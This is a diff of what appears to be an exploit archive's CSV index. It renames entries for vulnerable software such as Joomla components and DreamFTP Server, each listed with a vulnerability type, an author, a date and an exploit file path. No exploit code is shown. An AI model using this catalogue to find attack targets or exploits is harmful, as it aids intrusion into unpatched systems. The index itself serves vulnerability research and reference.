diff --git a/files.csv b/files.csv index 76fdce090..8e61f72c6 100755 --- a/files.csv +++ b/files.csv @@ -645,7 +645,7 @@ id,file,description,date,author,platform,type,port 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 (French Windows OS support) - Remote Buffer Overflow",2005-02-15,"Jerome Athias",windows,remote,80 820,platforms/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 822,platforms/windows/remote/822.c,"RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21 -823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21 +823,platforms/windows/remote/823.c,"BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead (Linux) - Server Remote Buffer Overflow",2005-02-18,millhouse,linux,remote,12203 @@ -2649,7 +2649,7 @@ id,file,description,date,author,platform,type,port 2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0 2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0 2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 -2972,platforms/windows/dos/2972.c,"Dream FTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0 +2972,platforms/windows/dos/2972.c,"BolinTech DreamFTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0 2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - (footer.inc.php) Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0 @@ -2805,7 +2805,7 @@ id,file,description,date,author,platform,type,port 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0 3127,platforms/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 -3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 +3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 3130,platforms/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0 3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0 3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",windows,remote,69 @@ -8038,7 +8038,7 @@ id,file,description,date,author,platform,type,port 8522,platforms/windows/dos/8522.pl,"Zervit Web Server 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard - Remote Denial of Service (PoC)",2009-04-23,shinnai,windows,dos,0 8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 (build 147) - Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 -8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0 +8525,platforms/windows/remote/8525.pl,"BolinTech DreamFTP Server 1.02 - 'users.dat' Arbitrary File Disclosure",2009-04-23,Cyber-Zone,windows,remote,0 8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow (PoC)",2009-04-23,x.CJP.x,windows,dos,0 8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow",2009-04-23,Stack,windows,local,0 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling",2009-04-24,ZoRLu,asp,webapps,0 @@ -10979,7 +10979,7 @@ id,file,description,date,author,platform,type,port 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0 12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing",2010-04-02,"Tobias Klein",windows,dos,0 12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - Exploit (2)",2010-04-02,"Richard leahy",windows,local,0 -12015,platforms/php/webapps/12015.txt,"Joomla! Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 +12015,platforms/php/webapps/12015.txt,"Joomla! Component 'com_menu' - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla! Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 12017,platforms/php/webapps/12017.txt,"Joomla! Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0 @@ -10999,7 +10999,7 @@ id,file,description,date,author,platform,type,port 12034,platforms/php/webapps/12034.txt,"Flatpress 0.909.1 - Persistent Cross-Site Scripting",2010-04-03,ITSecTeam,php,webapps,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - SEH Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2010-04-03,l3D,hardware,webapps,0 -12037,platforms/php/webapps/12037.txt,"Joomla! Component com_jp_jobs - SQL Injection",2010-04-03,Valentin,php,webapps,0 +12037,platforms/php/webapps/12037.txt,"Joomla! Component 'com_jp_jobs' 1.4.1 - SQL Injection",2010-04-03,Valentin,php,webapps,0 12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0 12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,multiple,webapps,0 12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0 @@ -11014,40 +11014,40 @@ id,file,description,date,author,platform,type,port 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0 12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Inclusion",2010-04-04,mat,php,webapps,0 12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' SEH Exploit",2010-04-04,TecR0c,windows,local,0 -12054,platforms/php/webapps/12054.txt,"Joomla! Component redSHOP - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 -12055,platforms/php/webapps/12055.txt,"Joomla! Component redTWITTER - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 -12056,platforms/php/webapps/12056.txt,"Joomla! Component WISro Yahoo Quotes - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 -12057,platforms/php/webapps/12057.txt,"Joomla! Component com_press - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 -12058,platforms/php/webapps/12058.txt,"Joomla! Component Picasa 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0 +12054,platforms/php/webapps/12054.txt,"Joomla! Component 'com_redshop' 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 +12055,platforms/php/webapps/12055.txt,"Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 +12056,platforms/php/webapps/12056.txt,"Joomla! Component 'com_wisroyq' 1.1 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 +12057,platforms/php/webapps/12057.txt,"Joomla! Component 'com_press' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 +12058,platforms/php/webapps/12058.txt,"Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0 12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' SEH Exploit",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0 -12060,platforms/php/webapps/12060.txt,"Joomla! Component com_serie - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 +12060,platforms/php/webapps/12060.txt,"Joomla! Component 'com_serie' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 12061,platforms/php/webapps/12061.txt,"Facil-CMS - (Local File Inclusion / Remote File Inclusion)",2010-04-04,eidelweiss,php,webapps,0 -12062,platforms/php/webapps/12062.txt,"Joomla! Component com_ranking - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 -12065,platforms/php/webapps/12065.txt,"Joomla! Component JInventory - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0 -12066,platforms/php/webapps/12066.txt,"Joomla! Component com_svmap 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 -12067,platforms/php/webapps/12067.txt,"Joomla! Component com_shoutbox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 -12068,platforms/php/webapps/12068.txt,"Joomla! Component com_loginbox - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 -12069,platforms/php/webapps/12069.txt,"Joomla! Component com_bca-rss-syndicator - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 -12070,platforms/php/webapps/12070.txt,"Joomla! Component Magic Updater (com_Joomlaupdater) - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 +12062,platforms/php/webapps/12062.txt,"Joomla! Component 'com_ranking' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 +12065,platforms/php/webapps/12065.txt,"Joomla! Component 'com_jinventory' - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0 +12066,platforms/php/webapps/12066.txt,"Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 +12067,platforms/php/webapps/12067.txt,"Joomla! Component 'com_shoutbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 +12068,platforms/php/webapps/12068.txt,"Joomla! Component 'com_loginbox' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 +12069,platforms/php/webapps/12069.txt,"Joomla! Component 'com_bca-rss-syndicator' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 +12070,platforms/php/webapps/12070.txt,"Joomla! Component 'com_Joomlaupdater' - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 12071,platforms/php/webapps/12071.txt,"jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2010-04-05,eidelweiss,php,webapps,0 12072,platforms/windows/dos/12072.pl,"MyVideoConverter 2.15 - Local Denial of Service",2010-04-05,anonymous,windows,dos,0 12073,platforms/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - '.mp3' Local Denial of Service",2010-04-05,anonymous,windows,dos,0 12074,platforms/windows/dos/12074.pl,"Portable AVS DVD Authoring 1.3.3.51 - Local Crash (PoC)",2010-04-05,R3d-D3V!L,windows,dos,0 12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps,0 12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0 -12077,platforms/php/webapps/12077.txt,"Joomla! Component News Portal com_news - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 -12078,platforms/php/webapps/12078.txt,"Joomla! Component FreeStyle FAQ Lite 1.3 com_fss (faqid) - SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 +12077,platforms/php/webapps/12077.txt,"Joomla! Component 'com_news_portal' 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 +12078,platforms/php/webapps/12078.txt,"Joomla! Component 'com_fss' 1.3 - 'faqid' Parameter SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 12079,platforms/windows/dos/12079.pl,"Microsoft Office 2010 Beta - Communicator SIP Denial of Service",2010-04-06,indoushka,windows,dos,0 12080,platforms/windows/dos/12080.txt,"Foxit Reader 3.2.1.0401 - Denial of Service",2010-04-06,juza,windows,dos,0 12081,platforms/windows/dos/12081.php,"Jzip 1.3 - '.zip' Unicode Buffer Overflow (PoC)",2010-04-06,mr_me,windows,dos,0 -12082,platforms/php/webapps/12082.txt,"Joomla! Component Saber Cart com_sebercart - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 -12083,platforms/php/webapps/12083.txt,"Joomla! Component J!WHMCS Integrator com_jwhmcs - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 -12084,platforms/php/webapps/12084.txt,"Joomla! Component Juke Box com_jukebox - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 -12085,platforms/php/webapps/12085.txt,"Joomla! Component Joomla! Flickr com_Joomlaflickr - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 -12086,platforms/php/webapps/12086.txt,"Joomla! Component Highslide JS com_hsconfig - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 -12087,platforms/php/webapps/12087.txt,"Joomla! Component Fabrik com_fabrik - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 -12088,platforms/php/webapps/12088.txt,"Joomla! Component Affiliate Feeds com_datafeeds - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 -12089,platforms/php/webapps/12089.txt,"Joomla! Component Appointment com_appointment - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 +12082,platforms/php/webapps/12082.txt,"Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 +12083,platforms/php/webapps/12083.txt,"Joomla! Component 'com_jwhmcs' 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 +12084,platforms/php/webapps/12084.txt,"Joomla! Component 'com_jukebox' 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 +12085,platforms/php/webapps/12085.txt,"Joomla! Component 'com_Joomlaflickr' 1.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 +12086,platforms/php/webapps/12086.txt,"Joomla! Component 'com_hsconfig' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 +12087,platforms/php/webapps/12087.txt,"Joomla! Component 'com_fabrik' 2.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 +12088,platforms/php/webapps/12088.txt,"Joomla! Component 'com_datafeeds' 880 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 +12089,platforms/php/webapps/12089.txt,"Joomla! Component 'com_appointment' 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0 12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0 12092,platforms/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting",2010-04-06,"Nahuel Grisolia",hardware,webapps,0 @@ -11055,94 +11055,94 @@ id,file,description,date,author,platform,type,port 12094,platforms/php/webapps/12094.txt,"ShopSystem - SQL Injection",2010-04-06,Valentin,php,webapps,0 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",linux,dos,0 12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 - Denial of Service Multiple Files",2010-04-06,anonymous,windows,dos,0 -12097,platforms/php/webapps/12097.txt,"Joomla! Component XOBBIX - prodid SQL Injection",2010-04-06,AntiSecurity,php,webapps,0 +12097,platforms/php/webapps/12097.txt,"Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection",2010-04-06,AntiSecurity,php,webapps,0 12098,platforms/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",php,webapps,0 12100,platforms/asp/webapps/12100.txt,"Espinas CMS - SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps,0 -12101,platforms/php/webapps/12101.txt,"Joomla! Component aWiki com_awiki - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 -12102,platforms/php/webapps/12102.txt,"Joomla! Component VJDEO com_vjdeo 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 +12101,platforms/php/webapps/12101.txt,"Joomla! Component 'com_awiki' - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 +12102,platforms/php/webapps/12102.txt,"Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0 12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - '.zip' PoC (SEH)",2010-04-07,ITSecTeam,windows,dos,0 12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting - Arbitrary File Upload",2010-04-07,indoushka,php,webapps,0 12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps,0 12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion",2010-04-07,eidelweiss,php,webapps,0 -12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0 +12108,platforms/php/webapps/12108.txt,"Joomla! Component 'com_articles' - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0 12109,platforms/multiple/dos/12109.txt,"Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos,0 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0 -12111,platforms/php/webapps/12111.txt,"Joomla! Component Webee Comments - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 -12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 -12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall-Joomla! - (cbuser) Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0 +12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 +12112,platforms/php/webapps/12112.txt,"Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 +12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0 12114,platforms/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0 12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit - Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 -12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro com_powermail - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0 +12118,platforms/php/webapps/12118.txt,"Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0 12119,platforms/windows/remote/12119.pl,"Microsoft Windows FTP Server 1.4 - Authentication Bypass",2010-04-09,chap0,windows,remote,0 -12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions com_foobla - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 -12121,platforms/php/webapps/12121.txt,"Joomla! Component JA Voice com_javoice - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0 +12120,platforms/php/webapps/12120.txt,"Joomla! Component 'com_foobla_suggestions' 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 +12121,platforms/php/webapps/12121.txt,"Joomla! Component 'com_javoice' - Local File Inclusion",2010-04-09,kaMtiEz,php,webapps,0 12122,platforms/multiple/remote/12122.txt,"JAVA Web Start - Arbitrary Command-Line Injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0 -12123,platforms/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0 -12124,platforms/php/webapps/12124.txt,"Joomla! Component huruhelpdesk - SQL Injection",2010-04-09,bumble_be,php,webapps,0 +12123,platforms/php/webapps/12123.txt,"Joomla! Component 'com_pcchess' - Local File Inclusion",2010-04-09,team_elite,php,webapps,0 +12124,platforms/php/webapps/12124.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-04-09,bumble_be,php,webapps,0 12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0 12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (Redhat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 -12132,platforms/php/webapps/12132.pl,"Joomla! Component com_agenda 1.0.1 - 'id' SQL Injection",2010-04-09,v3n0m,php,webapps,0 +12132,platforms/php/webapps/12132.pl,"Joomla! Component 'com_agenda' 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 12134,platforms/php/webapps/12134.txt,"MMHAQ CMS - SQL Injection",2010-04-10,s1ayer,php,webapps,0 12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0 -12136,platforms/php/webapps/12136.txt,"Joomla! Component com_properties[aid] - SQL Injection",2010-04-10,c4uR,php,webapps,0 -12137,platforms/php/webapps/12137.txt,"Joomla! Component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0 -12138,platforms/php/webapps/12138.txt,"Joomla! Component com_Ca - SQL Injection",2010-04-10,DigitALL,php,webapps,0 +12136,platforms/php/webapps/12136.txt,"Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection",2010-04-10,c4uR,php,webapps,0 +12137,platforms/php/webapps/12137.txt,"Joomla! Component 'com_allvideos' - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0 +12138,platforms/php/webapps/12138.txt,"Joomla! Component 'com_ca' - SQL Injection",2010-04-10,DigitALL,php,webapps,0 12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,php,webapps,0 12140,platforms/php/webapps/12140.php,"xBtiTracker - SQL Injection",2010-04-11,InATeam,php,webapps,0 12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",php,webapps,0 -12142,platforms/php/webapps/12142.txt,"Joomla! Component TweetLA! - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12143,platforms/php/webapps/12143.txt,"Joomla! Component Ticketbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12144,platforms/php/webapps/12144.txt,"Joomla! Component JA Job Board - Multiple Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12145,platforms/php/webapps/12145.txt,"Joomla! Component Jfeedback! - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12146,platforms/php/webapps/12146.txt,"Joomla! Component JProject Manager - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12147,platforms/php/webapps/12147.txt,"Joomla! Component Preventive And Reservation - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12148,platforms/php/webapps/12148.txt,"Joomla! Component RokModule - 'moduleid' Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0 -12149,platforms/php/webapps/12149.txt,"Joomla! Component spsNewsletter - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12150,platforms/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12151,platforms/php/webapps/12151.txt,"Joomla! Component TRAVELbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12142,platforms/php/webapps/12142.txt,"Joomla! Component 'com_tweetla' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12143,platforms/php/webapps/12143.txt,"Joomla! Component 'com_ticketbook' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12144,platforms/php/webapps/12144.txt,"Joomla! Component 'com_jajobboard' - Multiple Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12145,platforms/php/webapps/12145.txt,"Joomla! Component 'com_jfeedback' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12146,platforms/php/webapps/12146.txt,"Joomla! Component 'com_jprojectmanager' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12147,platforms/php/webapps/12147.txt,"Joomla! Component 'com_preventive' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12148,platforms/php/webapps/12148.txt,"Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0 +12149,platforms/php/webapps/12149.txt,"Joomla! Component 'com_spsnewsletter' - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12150,platforms/php/webapps/12150.txt,"Joomla! Component 'com_alphauserpoints' 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12151,platforms/php/webapps/12151.txt,"Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12152,platforms/windows/remote/12152.pl,"Trellian FTP Client - PASV Buffer Overflow",2010-04-11,zombiefx,windows,remote,0 -12153,platforms/php/webapps/12153.txt,"Joomla! Component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0 +12153,platforms/php/webapps/12153.txt,"Joomla! Component 'com_education_classess' - SQL Injection",2010-04-11,bumble_be,php,webapps,0 12154,platforms/php/dos/12154.txt,"vBulletin 'Cyb - Advanced Forum Statistics' Denial of Service",2010-04-10,"Andhra Hackers",php,dos,0 12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - Remote Code Execution",2010-04-11,"Amoo Arash",php,webapps,0 12156,platforms/windows/remote/12156.txt,"Microsoft Internet Explorer/Opera - Source Code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0 12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0 12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL Injection",2010-04-11,"Easy Laster",php,webapps,0 -12159,platforms/php/webapps/12159.txt,"Joomla! Component Multi-Venue Restaurant Menu Manager - SQL Injection",2010-04-11,Valentin,php,webapps,0 +12159,platforms/php/webapps/12159.txt,"Joomla! Component 'com_mv_restaurantmenumanager' 1.5.2 - SQL Injection",2010-04-11,Valentin,php,webapps,0 12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0 12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption (PoC)",2010-04-11,LiquidWorm,windows,dos,0 -12162,platforms/php/webapps/12162.txt,"Joomla! Component mv_restaurantmenumanager - SQL Injection",2010-04-11,Sudden_death,php,webapps,0 +12162,platforms/php/webapps/12162.txt,"Joomla! Component 'mv_restaurantmenumanager' - SQL Injection",2010-04-11,Sudden_death,php,webapps,0 12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0 12164,platforms/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File 